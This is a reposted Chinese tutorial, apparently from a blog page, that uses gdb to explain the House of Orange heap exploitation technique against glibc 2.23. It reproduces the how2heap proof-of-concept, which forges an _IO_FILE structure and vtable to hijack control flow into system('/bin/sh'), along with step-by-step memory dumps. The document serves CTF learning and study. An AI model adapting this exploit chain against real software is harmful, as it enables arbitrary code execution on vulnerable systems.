借助gdb调试glibc代码学习House of Orange

最新推荐文章于 2024-05-16 21:35:59 发布
最新推荐文章于 2024-05-16 21:35:59 发布
阅读量701 收藏 2
点赞数
分类专栏: C开源项目 计算机网络 网络安全
原文链接:https://bbs.pediy.com/thread-251195.htm
版权

转自: https://bbs.pediy.com/thread-251195.htm

house_of_orange

https://www.jianshu.com/p/1e45b785efc1

借助gdb调试glibc代码学习House of Orange

https://github.com/shellphish/how2heap/blob/master/glibc_2.25/house_of_orange.c

 

堆溢出-House of orange 学习笔记

https://www.jianshu.com/p/4b0a73f321f9

 

1.准备工作

学习了CTF比赛中的一种堆利用方法—house of orange,看了很多师傅们的博客和一些国外网站,现在总算理清了一些利用原理。

house of orange攻击的主要思路是利用unsorted bin attack修改_IO_list_all指针,并伪造_IO_FILE_plus结构体及其vtable(虚表)来劫持控制流。

 

为了更加深入地理解,很有必要gdb调试glibc中的malloc.c代码。以我的环境为例,在调试glibc代码前需要安装:

1)   Ubuntu 16.04 x64

2)   gdb。我个人使用pwndbg,您也可以使用其他,如gdb-peda。

3)   源代码和调试符号。借助于调试符号,逆向工程师就能调试任何感兴趣的内容了。

 

 

sudo apt-get install glibc-source 

sudo apt-get install libc6-dbg 

sudo tar xf /usr/src/glibc/glibc-2.23.tar.xz

 

 

在gdb提示符下输入以下内容:

pwndbg> directory /usr/src/glibc/glibc-2.23/malloc/

pwndbg> b _int_malloc

 

上面的gdb命令会在您单步执行时显示被调试函数的源代码。

 

实际上,在glibc中没有malloc(),只能找到__libc_malloc()和_int_malloc(),而_int_malloc()才是内存分配的函数。__libc_malloc()仅对_int_malloc()进行简单封装。本文贴出的大部分代码都是从_int_malloc()中截取的。

 

下面以https://github.com/shellphish/how2heap/blob/master/glibc_2.25/house_of_orange.c

中的代码为例说明house of orange的原理。

精简掉注释和相关说明后,程序主体如下所示

 

 

 

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

 

int winner ( char *ptr);

 

int main()

{

    char *p1, *p2;

    size_t io_list_all, *top;

    p1 = malloc(0x400-16);

    top = (size_t *) ( (char *) p1 + 0x400 - 16);

    top[1] = 0xc01;

    p2 = malloc(0x1000);

    io_list_all = top[2] + 0x9a8;

    top[3] = io_list_all - 0x10;

    memcpy( ( char *) top, "/bin/sh\x00", 8);

    top[1] = 0x61;

    _IO_FILE *fp = (_IO_FILE *) top;

    fp->_mode = 0; // top+0xc0

    fp->_IO_write_base = (char *) 2; // top+0x20

    fp->_IO_write_ptr = (char *) 3; // top+0x28

    size_t *jump_table = &top[12]; // controlled memory

    jump_table[3] = (size_t) &winner;

    *(size_t *) ((size_t) fp + sizeof(_IO_FILE)) = (size_t) jump_table; // top+0xd8

    /* Finally, trigger the whole chain by calling malloc */

    malloc(10);

    return 0;

}

int winner(char *ptr)

{

    system(ptr);

    return 0;

}

 

 

编译调试

 

gcc house_of_orange.c –g –o house_of_orange 

gdb ./house_of_orange

 

 

2.调试过程及原理说明

首先从堆中分配一个chunk

 

p1 = malloc(0x400-16);

pwndbg> heap

0x602000 PREV_INUSE {

  prev_size = 0x0,

  size = 0x401,

  fd = 0x0,

  bk = 0x0,

  fd_nextsize = 0x0,

  bk_nextsize = 0x0,

}

0x602400 PREV_INUSE {

  prev_size = 0x0,

  size = 0x20c01,

  fd = 0x0,

  bk = 0x0,

  fd_nextsize = 0x0,

  bk_nextsize = 0x0,

}

pwndbg> p p1

$2 = 0x602010 ""

 

2.1 泄露libc基址

考虑这么一种情况,假设在malloc时,程序中的bins里都没有合适的chunk,同时top chunk的大小已经不够用来分配这块内存。那么此时程序将会调用sysmalloc来向系统申请更多的空间。我们的目的在于用sysmalloc()中_int_free()获得一块释放的堆块。

 

对于堆来说有两种拓展方式:一是通过改变brk来拓展堆,二是通过mmap方式。其中只有brk拓展才会调用到_int_free()将老的top chunk释放掉,所以还需要满足一些条件。

 

由上述代码可知,要想使用brk拓展,需要满足chunk size < 0x20000

同时,在使用brk拓展之前还有一系列check

 

这里主要关注如何对齐到内存页。现代操作系统都是以内存也为单位进行内存管理的,一般内存也大小为4kb(0x1000),那么top chunk的size加上top chunk的地址所得到的值是和0x1000对齐的。

 

整理以上代码,所需条件有:

分配的chunk大小小于0x20000,大于top chunk的size

top chunk大小大于MINSIZE

top chunk的inuse等于1

top chunk的大小要对齐到内存页

 

满足了以上各种条件,就可以成功调用_int_free()来释放top chunk

 

此后,原先的top chunk将被放入unsorted bin中。

 

下一次分配时,就将会从unsorted bin中切割合适的大小,而切割下来的chunk的fd和bk的值将会是libc中的地址了。同时,若该chunk是large chunk,在fd_nextsize和bk_nextsize中还会储存堆中的地址,由此便可以完成信息泄露了。

 

利用代码

 

top = (size_t *) ( (char *) p1 + 0x400 - 16); 

top[1] = 0xc01;  //将top chunk的大小改为0xc01 

p2 = malloc(0x1000);

执行上面3句,将原先的top chunk 0x602400放入到unsortedbin中。其中,0x602400+0xC00= 0x603000,它与0x1000是对齐的。

 

调试过程如下:

 

top = (size_t *) ( (char *) p1 + 0x400 - 16);

pwndbg> p top

$1 = (size_t *) 0x602400

 

top[1] = 0xc01;

pwndbg> heap

0x602000 PREV_INUSE {

  prev_size = 0x0,

  size = 0x401,

  fd = 0x0,

  bk = 0x0,

  fd_nextsize = 0x0,

  bk_nextsize = 0x0,

}

0x602400 PREV_INUSE {

  prev_size = 0x0,

  size = 0xc01,

  fd = 0x0,

  bk = 0x0,

  fd_nextsize = 0x0,

  bk_nextsize = 0x0,

}

0x603000 {

  prev_size = 0x0,

  size = 0x0,

  fd = 0x0,

  bk = 0x0,

  fd_nextsize = 0x0,

  bk_nextsize = 0x0,

}

 

p2 = malloc(0x1000);

pwndbg> p p2

$3 = 0x623010 ""

pwndbg> bins

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x602400 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x602400

smallbins

empty

largebins

empty

 

2.2 劫持流程

接下来会涉及到IO_FILE的利用,这种方法被称为FSOP(File Stream Oriented Programming)。

每个FILE结构都通过一个_IO_FILE_plus结构体定义

 

其中包括一个_IO_FILE结构体和一个vtable虚表指针。_IO_FILE结构体保存了FILE的各种信息。vtable(虚表)指针指向了一系列函数指针。

 

_IO_FILE结构定义如下:

 

整个结构不用完全掌握,大概了解就行。

 

在进程中的产生的各个_IO_FILE结构会通过其中的struct _IO_FILE *_chain;连接在一起形成一个链表,其中表头使用全局变量struct _IO_FILE_plus *_IO_list_all来表示,通过_IO_list_all就可以遍历所有_IO_FILE结构。

 

_IO_jump_t *vtable结构定义如下,里面保存了一系列的函数指针。

 

以上,主要需要了解的就是 _IO_FILE_plus、_IO_FILE、vtable3个结构以及_IO_list_all指针的关系和及其内容。下面的图能较好地说明它们之间的关系。

 

2.3 unsortedbin attack

根据house of orange的流程,将利用unsortedbin attack来修改_IO_list_all指针的数值。

 

unsortedbin attack是怎么一回事呢,其实就是在malloc的过程中,unsortedbin会从链表上卸下来(只要分配的大小不是fastchunk大小)

 

在从unsorted bin中取出chunk时,会执行以下代码

这里将最后一个chunk取出,并把倒数第二个chunk的fd设置为unsorted_chunks(av),这里unsorted_chunks(av)就是main_arena中top成员变量的地址(&main_arena+88)。

 

可以发现,如果我们将victim的bk改写为某个地址,则可以向这个地址+0x10(即为bck->fd)的地方写入&main_arena+88。

 

 

io_list_all = top[2] + 0x9a8; 

top[3] = io_list_all - 0x10;

执行上面2句,相当于我们将unsortedbin中的chunk的bk改写成_IO_list_all - 0x10,这样当从unsorted bin中取出它时就可以成功将_IO_list_all改写为&main_arena+88
 

2.4 FSOP

在此之前,我们先了解一下malloc对错误信息的处理过程.

 

1)       在malloc出错时,会调用malloc_printerr函数来输出错误信息

2)       malloc_printerr又会调用__libc_message

3)       __libc_message又调用abort

4)       abort则又调用了_IO_flush_all_lockp

5)       最后_IO_flush_all_lockp中会调用到vtable中的_IO_OVERFLOW函数

 

所以如果可以控制_IO_list_all的数值,同时伪造一个_IO_FILE和vtable并放入FILE链表中,就可以让上述流程进入我们伪造的vtable,并调用被修改为system的_IO_OVERFLOW函数。

 

但是想要成功调用_IO_OVERFLOW函数还需要绕过一些阻碍

 

观察代码发现,_IO_OVERFLOW存在于if之中,根据短路原理,若要执行到_IO_OVERFLOW,就需要让前面的判断都能满足,即:

 

fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base

或者

 

_IO_vtable_offset (fp) == 0 

&& fp->_mode > 0 

&& (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base

以上两个条件至少要满足一个,这里我们将选择第一个,只需要构造mode、_IO_write_ptr和_IO_write_base。因为这些都是我们可以伪造的_IO_FILE中的数据,所以比较容易实现。
 

在前面介绍的unsortedbin attack可以将_IO_list_all指针的值修改为&main_arena+88。

 

但这还不够,因为我们很难控制main_arena中的数据,并不能在mode、_IO_write_ptr和_IO_write_base的对应偏移处构造出合适的值。

 

所以我们将目光转向_IO_FILE的链表特性。在前文_IO_flush_all_lockp函数的代码最后,可以发现程序通过fp = fp->_chain不断的寻找下一个_IO_FILE。

 

所以如果可以修改fp->_chain到一个我们伪造好的_IO_FILE的地址,那么就可以成功实现利用了。

 

巧妙的是,_IO_FILE结构中的chain字段对应偏移是0x68,而在&main_arena+88对应偏移为0x68的地址正好是大小为0x60的small bin的bk,而这个地址的刚好是我们可以控制的。

 

smallbins在main_arena中的位置:

下面截图说明:

(main_arena+88)+0x20为smallbin 0x20的fd,(main_arena+88)+0x28为smallbin 0x20的bk

… …

(main_arena+88)+0x60为smallbin 0x60的fd,(main_arena+88)+0x68为smallbin 0x60的bk

我们如果通过溢出,将位于unsorted bin中的chunk的size修改为0x61。(注:现在unsorted bin中的chunk就是之前被释放的top chunk的一部分),那么在下一次malloc的时候,因为在其他bin中都没有合适的chunk,malloc将会进入大循环,把unsorted bin中的chunk放回到对应的small bin或large bin中。

 

因此,我们将位于unsorted bin中的chunk的size修改为0x61,因此该chunk就会被放入大小为0x60的small bin中,同时,该small bin的fd和bk都会变为此chunk的地址。

 

这样,当_IO_flush_all_lockp函数通过fp->_chain寻找下一个_IO_FILE时,就会寻找到smallbin 0x60中的chunk。

 

只要在这个chunk中伪造好_IO_FILE结构体以及vtable,把_IO_OVERFLOW设置为system,然后就可以成功getshell了。

 

利用代码

 

 

memcpy( ( char *) top, "/bin/sh\x00", 8);      //传输system()函数所需的/bin/sh

top[1] = 0x61;      //为了将chunk放到smallbins[0x60]中

_IO_FILE *fp = (_IO_FILE *) top;

fp->_mode = 0; // top+0xc0

fp->_IO_write_base = (char *) 2; // top+0x20

fp->_IO_write_ptr = (char *) 3; // top+0x28

size_t *jump_table = &top[12]; // controlled memory

jump_table[3] = (size_t) &winner;

*(size_t *) ((size_t) fp + sizeof(_IO_FILE)) = (size_t) jump_table; // top+0xd8

/* Finally, trigger the whole chain by calling malloc */

malloc(10);

 

调试过程

pwndbg> x  &_IO_list_all

0x7ffff7dd2520 <_IO_list_all>:         0xf7dd2540

pwndbg> x  &main_arena

0x7ffff7dd1b20 <main_arena>:       0x00000000

 

io_list_all = top[2] + 0x9a8;  

pwndbg> p io_list_all

$6 = 140737351853344     //0x7FFFF7DD2520

 

top[3] = io_list_all - 0x10;

0x602400 PREV_INUSE {

  prev_size = 0x0,

  size = 0xbe1,

  fd = 0x7ffff7dd1b78,

  bk = 0x7ffff7dd2510,

  fd_nextsize = 0x0,

  bk_nextsize = 0x0,

}

 

memcpy( ( char *) top, "/bin/sh\x00", 8);

pwndbg> x/20gx 0x602400

0x602400:        0x0068732f6e69622f       0x0000000000000be1

0x602410:        0x00007ffff7dd1b78         0x00007ffff7dd2510

0x602420:        0x0000000000000000     0x0000000000000000

0x602430:        0x0000000000000000     0x0000000000000000

0x602440:        0x0000000000000000     0x0000000000000000

0x602450:        0x0000000000000000     0x0000000000000000

0x602460:        0x0000000000000000     0x0000000000000000

0x602470:        0x0000000000000000     0x0000000000000000

0x602480:        0x0000000000000000     0x0000000000000000

0x602490:        0x0000000000000000     0x0000000000000000

 

通过在_IO_list_all设置硬件断点(wa *0x7ffff7dd2520),通过gdb调试glibc代码,发现执行完bck->fd=unsorted_chunks(av)
后,_IO_list_all所指的数值改成了main_arena+88

 

top[1] = 0x61;  

将这个chunk放入smallbin 0x60,所以将size位设置为0x61。同时,small bin[0x60]的fd和bk都会变为此chunk的地址

 

pwndbg> x/20gx 0x602400

0x602400:        0x0068732f6e69622f       0x0000000000000061

0x602410:        0x00007ffff7dd1b78         0x00007ffff7dd2510

0x602420:        0x0000000000000000     0x0000000000000000

0x602430:        0x0000000000000000     0x0000000000000000

0x602440:        0x0000000000000000     0x0000000000000000

0x602450:        0x0000000000000000     0x0000000000000000

0x602460:        0x0000000000000000     0x0000000000000000

0x602470:        0x0000000000000000     0x0000000000000000

0x602480:        0x0000000000000000     0x0000000000000000

0x602490:        0x0000000000000000     0x0000000000000000

 

gdb调试glibc代码,设置断点b _int_malloc,发现执行完下列语句后,将地址为0x602400的chunk放入smallbins[0x60]

 

由于之前unsortedbin attack来将_IO_list_all指针的值修改为&main_arena+88。

这样,当_IO_flush_all_lockp函数通过fp->_chain寻找下一个_IO_FILE时,就会寻找到smallbin 0x60中的chunk。

 

 

 

_IO_FILE *fp = (_IO_FILE *) top;

fp->_mode = 0; // top+0xc0

fp->_IO_write_base = (char *) 2; // top+0x20

fp->_IO_write_ptr = (char *) 3; // top+0x28

pwndbg> x/50gx 0x602400

0x602400:        0x0068732f6e69622f       0x0000000000000061

0x602410:        0x00007ffff7dd1b78         0x00007ffff7dd2510

0x602420:        0x0000000000000002     0x0000000000000003

0x602430:        0x0000000000000000     0x0000000000000000

0x602440:        0x0000000000000000     0x0000000000000000

0x602450:        0x0000000000000000     0x0000000000000000

0x602460:        0x0000000000000000     0x0000000000000000

0x602470:        0x0000000000000000     0x0000000000000000

0x602480:        0x0000000000000000     0x0000000000000000

0x602490:        0x0000000000000000     0x0000000000000000

0x6024a0:        0x0000000000000000     0x0000000000000000

0x6024b0:        0x0000000000000000     0x0000000000000000

0x6024c0:         0x0000000000000000     0x0000000000000000

 

 

size_t *jump_table = &top[12]; // controlled memory

pwndbg> p jump_table

$7 = (size_t *) 0x602460

jump_table[3] = (size_t) &winner;

pwndbg> x/20gx 0x602400

0x602400:        0x0068732f6e69622f       0x0000000000000061

0x602410:        0x00007ffff7dd1b78         0x00007ffff7dd2510

0x602420:        0x0000000000000002     0x0000000000000003

0x602430:        0x0000000000000000     0x0000000000000000

0x602440:        0x0000000000000000     0x0000000000000000

0x602450:        0x0000000000000000     0x0000000000000000

0x602460:        0x0000000000000000     0x0000000000000000

0x602470:        0x0000000000000000     0x000000000040078f

0x602480:        0x0000000000000000     0x0000000000000000

0x602490:        0x0000000000000000     0x0000000000000000

 

 

*(size_t *) ((size_t) fp + sizeof(_IO_FILE)) = (size_t) jump_table; // top+0xd8

pwndbg> x/50gx 0x602400

0x602400:        0x0068732f6e69622f       0x0000000000000061

0x602410:        0x00007ffff7dd1b78         0x00007ffff7dd2510

0x602420:        0x0000000000000002     0x0000000000000003

0x602430:        0x0000000000000000     0x0000000000000000

0x602440:        0x0000000000000000     0x0000000000000000

0x602450:        0x0000000000000000     0x0000000000000000

0x602460:        0x0000000000000000     0x0000000000000000

0x602470:        0x0000000000000000     0x000000000040078f

0x602480:        0x0000000000000000     0x0000000000000000

0x602490:        0x0000000000000000     0x0000000000000000

0x6024a0:        0x0000000000000000     0x0000000000000000

0x6024b0:        0x0000000000000000     0x0000000000000000

0x6024c0:         0x0000000000000000     0x0000000000000000

0x6024d0:        0x0000000000000000     0x0000000000602460

 

pwndbg> p (*(struct _IO_FILE_plus *) 0x602400)

$4 = {

  file = {

    _flags = 1852400175,

    _IO_read_ptr = 0x61 <error: Cannot access memory at address 0x61>,

    _IO_read_end = 0x7ffff7dd1b78 <main_arena+88> "\020@b",

    _IO_read_base = 0x7ffff7dd2510 "",

    _IO_write_base = 0x2 <error: Cannot access memory at address 0x2>,

    _IO_write_ptr = 0x3 <error: Cannot access memory at address 0x3>,

    _IO_write_end = 0x0,

    _IO_buf_base = 0x0,

    _IO_buf_end = 0x0,

    _IO_save_base = 0x0,

    _IO_backup_base = 0x0,

    _IO_save_end = 0x0,

    _markers = 0x0,

    _chain = 0x0,

    _fileno = 0,

    _flags2 = 0,

    _old_offset = 4196239,

    _cur_column = 0,

    _vtable_offset = 0 '\000',

    _shortbuf = "",

    _lock = 0x0,

    _offset = 0,

    _codecvt = 0x0,

    _wide_data = 0x0,

    _freeres_list = 0x0,

    _freeres_buf = 0x0,

    __pad5 = 0,

    _mode = 0,

    _unused2 = '\000' <repeats 19 times>

  },

  vtable = 0x602460

}

 

pwndbg> p (*(struct _IO_jump_t *) 0x602460)

$5 = {

  __dummy = 0,

  __dummy2 = 0,

  __finish = 0x0,

  __overflow = 0x40078f <winner>,

  __underflow = 0x0,

  __uflow = 0x0,

  __pbackfail = 0x0,

  __xsputn = 0x0,

  __xsgetn = 0x0,

  __seekoff = 0x0,

  __seekpos = 0x0,

  __setbuf = 0x0,

  __sync = 0x0,

  __doallocate = 0x0,

  __read = 0x0,

  __write = 0x602460,

  __seek = 0x0,

  __close = 0x0,

  __stat = 0x0,

  __showmanyc = 0x0,

  __imbue = 0x0

}

 

因为unsortedbin attack的时候破坏了unsorted bin的链表结构,所以接下来的分配过程会出现错误,系统调用malloc_printerr去打印错误信息,从而被我们劫持流程,执行到winner,然后由winner执行system函数。

 

3. 总结

之前看了很多house of orange的介绍,总不得要领。通过gdb调试glibc的malloc.c后,才知道unsortedbin attack,FSOP的操作都是在最后执行malloc(10)的时候完成的

 

完整地跟踪一遍_int_malloc()函数就清楚了:当调用malloc(10)时,首先将unsortedbin中的chunk摘下来,从而导致_IO_list_all修改为main_arena+88

 

之后将摘下来的chunk放到smallbin[0x60]中

 

最后,由于unsortedbin attack破坏了unsorted bin的链表结构。此时,victim= (mchunkptr) 0x7ffff7dd2510,victim->size=0,满足__builtin_expect (victim->size <= 2 * SIZE_SZ, 0),所以在大循环中系统调用malloc_printerr去打印错误信息。

 

从而被我们劫持流程,执行到winner,然后由winner执行system函数。

 

而下面的这些语句仅仅是为漏洞利用提供子弹而已

 

 

io_list_all = top[2] + 0x9a8;

top[3] = io_list_all - 0x10;

memcpy( ( char *) top, "/bin/sh\x00", 8);

top[1] = 0x61;

_IO_FILE *fp = (_IO_FILE *) top;

fp->_mode = 0; // top+0xc0

fp->_IO_write_base = (char *) 2; // top+0x20

fp->_IO_write_ptr = (char *) 3; // top+0x28

size_t *jump_table = &top[12]; // controlled memory

jump_table[3] = (size_t) &winner;

*(size_t *) ((size_t) fp + sizeof(_IO_FILE)) = (size_t) jump_table; // top+0xd8

 

malloc(10);才会最终执行malloc中的攻击链,它才是关键的扳机操作。

 

happylzs2008
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
gdb 调试gdb 调试gdb 调试gdb 调试gdb 调试
07-19
### gdb调试工具详解 #### 一、gdb简介与基本信息操作 gdb(GNU调试器)是GNU项目的一部分,主要用于程序的调试工作。它支持多种操作系统,并能够对C、C++等语言编写的程序进行调试。 ##### 显示gdb版本信息 ```...
使用GDB调试PHP代码,解决PHP代码死循环问题
10-24
主要介绍了使用GDB调试PHP代码,解决PHP代码死循环问题,需要的朋友可以参考下
覆盖GNU C库中调试glibc函数
吴遥的专栏
01-03 1452
一种调试 glibc 函数的好方法是用您自己的版本覆盖所关注的函数。在没有 root 许可权和不必重新编译 libc 源代码的情况下就可以完成这个任务。想象一下编写您自己的 open() 版本该有多激动啊!    如果您没有应用程序的源代码并且由于 C 的 GNU库(glibc)函数正将某些错误信息返回给该应用程序而使它失败,那么您该怎么办? 因为 glibc是开放源码,所以您当然可以
使用gdb调试glibc
onlyForCloud的专栏
07-02 1242
http://www.it165.net/os/html/201305/5108.html 使用gdb调试glibc 作者:Bean_lee  发布日期:2013-05-02 21:11:44     我在学习glibc 在main函数之前的时候,其实已经有类似的需求了,只不过当时不够激进,没有想到调试glibc 。 这两天在学习NPTL线程栈
gdb添加libc调试信息和导入libc源码
最新发布
llovewuzhengzi的博客
05-16 819
symtab是全面的,包含程序中的所有符号信息,既包括本地静态符号也包括全局符号,主要用于链接和调试。.dynsym则更加精简,仅记录那些动态链接过程中需要用到的符号,通常这些符号属于动态链接库或者需要被其他共享对象链接的全局符号。
用GDB追踪glibc代码执行过程
onlyForCloud的专栏
07-02 1527
http://blog.nlogn.cn/trace-glibc-by-using-gdb/ 工欲善其事,必先利其器。 首先需要安装一下额外的工具包,一个是 libc6-dbg,这是带有debug symbol信息的 libc.so;另一个是libc6-dev,这是glibc的源代码,获取之后我们就可以在gdb中查看代码了。 在Ubuntu/Debian 系统上,我们可以通过以下2条
glibc编译和调试
千重浪Linux技术工作室
10-08 1726
1. SELS 11.1 glibc-2.9-2.8.src.rpm libsepol-devel-2.0.32-5.38.i586.rpm libselinux-devel-2.0.71-3.38.i586.rpm 2.安装libsepol-devel,libselinux-devel 和glibc-2.9-2.8.src.rpm 3.rpmbuild -bb gl
GDB调试程序(整理有书签).pdf
01-07
在IT行业中,调试是软件开发过程中的重要环节,特别是在Linux环境下,GDB(GNU Debugger)作为一款强大的命令行调试工具,被广泛应用于C/C++等语言的程序调试。本篇文章将详细阐述GDB的使用方法及其核心功能,帮助你...
Glibc编译及调试
Starr
04-07 3259
文章目录1. 获取glibc源码2. 配置及编译安装结果3. 源码调试gdbvscode 1. 获取glibc源码 官网: https://www.gnu.org/software/libc/ https://www.gnu.org/software/libc/sources.html FTP:https://ftp.gnu.org/gnu/glibc/ 编译教程:https://sourceware.org/glibc/wiki/Testing/Builds 手册:https://www.gnu.or
用gdb 调试,跟踪glibc库文件
hjjdebug的专栏
09-09 9350
---------------------------------------- 用gdb 调试,跟踪glibc库文件 ----------------------------------------   这里以调试跟踪glibc 文件为例, 跟踪printf, 没有想象的那么激动。 1. 下载连接库分离的debug 信息 a.    vim /etc/yum.repo.d/
day7——libc之gdb调试
m0_73858054的博客
12-06 89
并且在随后进行s1与buf字符串的比较,比较结果影响v5的值,如果我们能够溢出到v5的位置,将其值修改为一个不为0的数,那么程序将会自动执行print_flag函数。另外就是,为了debug掌握了调试方法,所以本篇将使用调试的方法取得想要的值。之后即可进行.got表泄露,随后接收返回的地址查表计算system函数及binsh字符串所在位置,并进行利用即可。很有意思的一道题,只要溢出一下就可以了,只要溢出就会有答案。这道题让我debug了整整两天,必须记下来,以警醒自己,写脚本不规范,debug两行泪。
glibc 知:通用调试技术
canpool
07-31 542
文章目录1. 调试加载器1.1. 在应用主程序之前调试加载器1.2. 单步执行加载器1.3. 使用备用加载器进行调试2. 将错误构建中的代码注入到良好构建中的测试用例中2.1. 设想前提条件2.2. 设想调试选项2.3. 识别故障点2.4. 从错误的构建中提取有问题的 .o 文件2.5. 生成脚本以链接有问题的 .o 文件以清理构建 test-memcpy2.6. 识别有问题的代码,重新生成有问题的 mempcy.o 并重新链接2.7. 动态链接最终可执行文件不起作用的角落案例3. GLIBC 搜索顺序4.
GDB调试-新手笔记3
weixin_44442852的博客
10-07 549
ldd命令 + readelf ldd 在制作自己的发行版时经常需要判断某条命令需要哪些共享库文件的支持,以确保指定的命令在独立的系统内可以可靠的运行。 ldd stack0 可以找到stack0程序使用的共享库,libc的文件路径:/lib/arm-linux-gnueabihf/libc.so.6 (0x76dfc000) readelf readelf -s (-s --syms ...
GDB调试glibc配置源码解决方案
、moddemod
06-06 1759
笔者环境 sudo apt install glibc-source 在/usr/src/glibc文件夹下会有glibc源文件的压缩包 解压后得到源码 tar xvf glibc-2.23.tar.xz 指定源码目录 进入gdb后指定源码目录 directory /usr/src/glibc/glibc-2.23 也可通过配置.gdbinit文件 这样启动gdb后就会自动加载了 ...
gdb调试程序问题分析
悟心成长博客
07-26 1638
项目问题: 在日常程序开发中不免遇到类似空指针操作导致程序崩溃的问题,所以需要一定的手段去定位bug,而断点调试是普遍使用的技巧,,但在Linux系统中使用的是没有图形界面的调试工具-GDB(听说eclipse支持GUI调试,暂未尝试),所以需要通过指令进行操作,下面逐步介绍gdb调试定位进程崩溃问题。 问题描述: linux 嵌入是系统的进程启动后当与另一个进程进行数据传输的时候,会发现进程崩溃现象。 原因分析: 在log 日志中无法定位进程崩溃的问题,因此我想到使用gdb进行调试此程序。GDB是一个由G
GDB内存调试初探八
yeholmes的专栏
10-10 1011
Linux/amd64的调用规则 为了方便调试,笔者在PC机上直接调试简单的内存相关的应用;这需要了解x86_64的ABI,该文档对函数调用制定了一些限定规则,其中重要的有两点,第一点是参数的传参(非浮点参数): User-level applications use as integer registers for passing the sequence: %rdi, %rsi, %rdx, %rcx, %r8 and %r9. The kernel interface uses %rdi, %rsi,
gdb可视化调试过程中需要注意的问题点
Nucleusx的专栏
09-28 275
1.调试过程中与实际行号对应不上 原因是编译器优化的问题,需要查看编译选项中是否有-O2或者-O3的编译选项,将优化的编译选项去掉后,一般就可以对应上了 2.一定要加上-g选项,不然会找不到符号 ...
带libc源码gdb动态调试(导入glibc库使得可执行文件动态调试时可看见调用库函数源码
llovewuzhengzi的博客
01-28 3282
如前所述,如果将debuginfo文件直接放到/usr/lib/debug目录(或者通过set-debug-file-directory命令设置的根目录)下,也是可以的,但文件目录的组织结构必须和运行时的目录组织结构一样,这个地方有一个需要注意的地方,特别是对于so文件,在debug-root-directory目录下寻找对应的debuginfo文件时,和文件实际所在的位置不一定完全一致,而要看连接器能够找到的路径,即ldd所显示的路径。每个版本的gcc和标准库版本的对应关系可以在官方文档中找到。
house of orange
qq_46441427的博客
10-16 120
house of orange是一道同名题的技术 先看一下保护机制,是保护全开的 一般做堆题先泄露libc的地址,但是这里没有free 这里有个思路 修改top chunk的size值,然后malloc一个比这个大的chunk,然后系统调用sysmalloc分配堆,最后top chunk就会被释放,放入unsorted bin,相当于可以达到free一个堆块的效果了 可以看到我们已经成功泄露出main arena 然后再edit0x10个字节,就可以打印出堆地址 然后利用unsorted bin修改_
深入学习Linux下的GDB调试技巧
"这篇文档是关于Linux环境下使用GDB进行程序调试的教程,全面解析了GDB的使用方法和技巧。GDB是一个强大的命令行调试工具,尤其在UNIX系统中,它的功能远超Windows下的图形化调试器。GDB主要提供四大功能:启动并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值